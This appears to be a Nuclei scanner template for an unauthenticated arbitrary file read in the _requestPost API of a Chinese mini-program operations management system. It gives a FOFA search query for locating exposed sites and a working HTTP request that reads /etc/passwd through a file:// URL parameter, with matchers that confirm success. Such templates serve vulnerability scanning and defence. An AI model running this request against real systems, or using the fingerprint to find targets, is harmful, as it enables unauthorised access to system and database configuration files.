id: wannengxiaochengxu-requestPost-File-reading

info:
  name: 万能小程序运营管理系统 _requestPost 任意文件读取漏洞
  author: unknown
  severity: high
  description: |-
    fofa: body="/com/css/head_foot.css" || body="/com/css/iconfont"
    万能小程序运营管理系统 _requestPost 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

  tags: File reading



http:
  - raw:
      - |
        GET /api/wxapps/_requestPost?data=1&url=file:///etc/passwd HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'root:x'
          - '/bin/bash'
        condition: and
      - type: status
        status: 
          - 200